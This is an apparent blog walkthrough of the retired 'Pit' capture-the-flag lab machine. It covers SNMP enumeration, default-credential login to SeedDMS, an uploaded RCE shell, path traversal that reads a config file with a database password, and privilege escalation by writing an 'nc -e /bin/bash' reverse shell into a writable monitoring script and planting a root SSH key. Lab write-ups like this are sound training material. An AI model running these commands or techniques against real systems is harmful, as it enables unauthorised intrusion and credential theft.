Pit is a vulnerable machine with linux operating system among retired machines and it is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, 22/tcp ssh OpenSSH, 80/tcp http nginx 1.14, 9090/tcp ssl/zeus-admin, 161/udp snmp ports are open.
Here we encountered dms-pit.htb and we save it to the host file.

We provide snmp enumueratio
nmap -A -sU -p161 -Pn

snmpwalk -v2c -c public .

Their files are remarkable
Let’s try to go to it when there is a file in the html.
Here it redirected us to the login page

We tried the default passwords to log in here, but we could not see the user michelle, so we tried the same username and password here and we were able to log in.

Here we provide enumueration

Let’s see if there is a vulnerability in Searchploit

We have seen that there is an RCE vulnerability here. Let’s save the code given here as Shell.php and try to install it

Here we see the document id as 29, which is written in the fourth step of the vulnerability.
let’s log in as

In this way, we read the passwd file and then tried various ways to give us Shell, but we could not get any Shell, so we provide enumeration via this url.

../../../../conf/settings.xml directory we see the settinggs xml file
Here we access credential information.

dbDriver=”mysql” dbHostname=”localhost” dbDatabase=”seeddms” dbUser=”seeddms” dbPass=”ied^ieY6xoquu” doNotCheckVersion=”false”>
here was the login screen on port 9090, let’s log in by trying this username and password

We tried to log in with seeddms username without success on user michelle
we were able to make a surprise entry

We saw the terminal server in the bottom left option.

Here we were able to get the user flag but not the root directory, so we continue with the local enumeration.

We did not get any information from linpeas.sh, let’s look at the monitor file from smpwalk /usr/bin/monitor
When we went and looked, we couldn’t see anything.
We saw it using ls -ld because only root is authorized.

With Getfacl we displayed the owner, group and Access Control List (ACL).

Let’s see if we can write something in it or not;

We can write in it
Here instead of check.sh we make it give us a reverseshell.
echo “nc 4444 -e /bin/bash” > /usr/local/monitoring/check.sh

Then we listen with nc and smtp check to work
snmpwalk -m +MY-MIB -v2c -c public nsExtendObjects
we got the command sell on root yetsinde to the user
does not give any output here

Here we encounter the problem, this problem does not give us output from the command we wrote, we tried to get revereshell, it did not give it again, let’s add the .pub plugin to the root .ssh folder here, the file we created with sshkeygen

Let’s take this key and add it to the root termianl

Then let’s use this ssh key and get shel

We finally got our root flag
A difficult and challenging machine 🙂

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir